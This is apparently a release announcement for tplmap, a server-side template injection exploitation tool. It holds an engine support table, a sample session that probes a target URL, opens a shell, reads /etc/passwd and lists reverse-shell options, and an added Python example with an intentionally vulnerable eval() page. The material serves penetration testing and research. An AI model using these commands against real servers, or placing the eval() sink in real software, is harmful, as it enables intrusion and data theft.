tplmap v0.5 releases: Code & Server-Side Template Injection Detection & Exploitation Tool
Tplmap
Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.
The tool and its test suite are developed to research the SSTI vulnerability class and to be used as an offensive security tool during web application penetration tests.
The sandbox break-out techniques come from James Kettle's Server-Side Template Injection: RCE For The Modern Web App and other public research [1] [2], extended by original work done for this tool [3] [4].
It can fully compromise the server across several code-context and blind-injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP and Java, and generic unsandboxed template engines.
Supported template engines
Tplmap supports over 15 template engines, unsandboxed template engines, and generic eval()-like injections.
Template engine | Remote Command Execution | Blind | Code evaluation | File read | File write |
---|---|---|---|---|---|
Mako | ✓ | ✓ | Python | ✓ | ✓ |
Jinja2 | ✓ | ✓ | Python | ✓ | ✓ |
Python (code eval) | ✓ | ✓ | Python | ✓ | ✓ |
Tornado | ✓ | ✓ | Python | ✓ | ✓ |
Nunjucks | ✓ | ✓ | JavaScript | ✓ | ✓ |
Jade | ✓ | ✓ | JavaScript | ✓ | ✓ |
doT | ✓ | ✓ | JavaScript | ✓ | ✓ |
Marko | ✓ | ✓ | JavaScript | ✓ | ✓ |
JavaScript (code eval) | ✓ | ✓ | JavaScript | ✓ | ✓ |
Dust (<= dustjs-helpers@1.5.0) | ✓ | ✓ | JavaScript | ✓ | ✓ |
EJS | ✓ | ✓ | JavaScript | ✓ | ✓ |
Ruby (code eval) | ✓ | ✓ | Ruby | ✓ | ✓ |
Slim | ✓ | ✓ | Ruby | ✓ | ✓ |
ERB | ✓ | ✓ | Ruby | ✓ | ✓ |
Smarty (unsecured) | ✓ | ✓ | PHP | ✓ | ✓ |
PHP (code eval) | ✓ | ✓ | PHP | ✓ | ✓ |
Freemarker | ✓ | ✓ | × | ✓ | ✓ |
Velocity | ✓ | ✓ | × | ✓ | ✓ |
Twig | × | × | × | × | × |
Smarty (secured) | × | × | × | × | × |
Dust (> dustjs-helpers@1.5.0) | × | × | × | × | × |
Changelog v0.5
- Use stdout for prints to close #47
- Support Python3 to close #33
- Use Docker for testing environments
- Use TravisCI
- Fix Smarty caching quirks
- Add requirements.txt
- Fix Jinja2 false negatives
Installation
git clone https://github.com/epinna/tplmap.git
pip install -r requirements.txt
Exploitation
Tplmap is able to detect and exploit SSTI in a range of template engines to get access to the underlying file system and operating system. Run it against a URL to test whether its parameters are injectable.
$ ./tplmap.py -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.3
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
...
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: linux
  Technique: render
  Capabilities:

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Rerun tplmap providing one of the following options:

    --os-shell                Run shell on the target
    --os-cmd                  Execute shell commands
    --bind-shell PORT         Connect to a shell bind to a target port
    --reverse-shell HOST PORT Send a shell back to the attacker's port
    --upload LOCAL REMOTE     Upload files to the server
    --download REMOTE LOCAL   Download remote files
Use the --os-shell option to launch a pseudo-terminal on the target.
$ ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.3
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Run commands on the operating system.
linux $ whoami
www
linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
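The session above shows the render technique in action: each plugin wraps a probe in its engine's tag syntax, checks whether the page evaluates it, and only then verifies each capability (shell, file read, code evaluation) before reporting it. The following is an added example, not tplmap's own code, that reduces that flow to in-process functions so it runs offline. The tag syntaxes are the ones tplmap prints while testing ({*}, ${*}, {{*}}) plus a bare * for eval()-like sinks; the three backends, the exact-match detection rule and the string-concatenation confirmation payload are this example's own constructions, not tplmap's. It also shows the caveat the capabilities step exists for: an arithmetic-only evaluator renders 7*7 as 49 just like an injectable page, so a rendered product alone is not proof of code execution.

```python
"""Render-based SSTI / code-injection probing, reduced to stand-alone functions.

Added example, not tplmap's own code.  `send(value)` stands for one HTTP
request with the tested parameter set to `value`; the backends below are
constructed stand-ins for the target page, so nothing touches the network.
"""
import ast
import operator
import random

# Tag syntaxes, '*' marking where the probe goes (as printed by the plugins above).
ENGINE_TAGS = {
    "Smarty": "{*}",
    "Mako": "${*}",
    "Jinja2": "{{*}}",
    "Python (code eval)": "*",        # eval()-like sinks need no tag at all
}


def detect_render(send, tags=ENGINE_TAGS, rng=None):
    """Return (engine, tag) for the first syntax whose arithmetic probe is evaluated.

    A benign numeric baseline is taken first so the check is exact: the probe
    response must equal the baseline with the token swapped for the product.
    That rejects near-misses such as a Python eval() turning '{7*7}' into the
    set '{49}', which a plain substring match would accept.
    """
    rng = rng or random
    token = str(rng.randint(10**6, 10**7))
    baseline = send(token)
    if token not in baseline:
        return None                           # parameter is not reflected at all
    for engine, tag in tags.items():
        a, b = rng.randint(1000, 9999), rng.randint(1000, 9999)
        probe = tag.replace("*", f"{a}*{b}")  # two random operands: product is unguessable
        if send(probe) == baseline.replace(token, str(a * b)):
            return engine, tag
    return None


def confirm_python_eval(send, tag, rng=None):
    """Second stage (this example's own check): only real code evaluation can
    concatenate two string literals; a calculator that only does arithmetic cannot."""
    rng = rng or random
    left, right = str(rng.randint(10**6, 10**7)), str(rng.randint(10**6, 10**7))
    payload = tag.replace("*", f"''.join(['{left}','{right}'])")
    return (left + right) in send(payload)


def assess(send, rng=None):
    """Full flow: find the render syntax, then confirm the capability before reporting."""
    hit = detect_render(send, rng=rng)
    if hit is None:
        return "not injectable"
    engine, tag = hit
    if engine == "Python (code eval)" and not confirm_python_eval(send, tag, rng):
        return "arithmetic rendered but code evaluation refused (not exploitable as-is)"
    return f"injectable: {engine} via {tag}"


# --- constructed backends standing in for the target page -------------------

def vulnerable_page(name):
    """Deliberately vulnerable: the 'Python (code eval)' row of the table above."""
    try:
        return f"<p>Hello {eval(name)}</p>"  # noqa: S307 - the sink under test
    except Exception:
        return "<p>500 Internal Server Error</p>"


_ARITH_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
              ast.Mult: operator.mul, ast.Div: operator.truediv,
              ast.USub: operator.neg}


def safe_arith(expr):
    """Evaluate numeric expressions only, by walking the AST against a whitelist."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if (isinstance(node, ast.Constant) and isinstance(node.value, (int, float))
                and not isinstance(node.value, bool)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _ARITH_OPS:
            return _ARITH_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _ARITH_OPS:
            return _ARITH_OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"disallowed syntax: {type(node).__name__}")
    return walk(ast.parse(expr, mode="eval"))


def hardened_page(name):
    """Same feature without eval(): still renders 7*7 -> 49, but runs no code."""
    try:
        return f"<p>Hello {safe_arith(name)}</p>"
    except (ValueError, SyntaxError):
        return "<p>400 Bad Request</p>"


def static_page(name):
    """Plain reflection, no evaluation of any kind."""
    return f"<p>Hello {name}</p>"


if __name__ == "__main__":
    for label, page in (("vulnerable", vulnerable_page),
                        ("hardened", hardened_page),
                        ("static", static_page)):
        print(f"{label:10} -> {assess(page)}")
```

Against the vulnerable page the Smarty-style probe {1234*5678} comes back as the Python set {7006652}, which the exact-match rule correctly ignores, and the bare * probe is the one that detects and then confirms. Against the hardened page the same probe also renders the product, but the confirmation payload is refused, so the result is reported as rendered-but-not-exploitable rather than as an injection point.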
Suggested reading:
- https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/
- https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/
Copyright (C) epinna
Source: https://github.com/epinna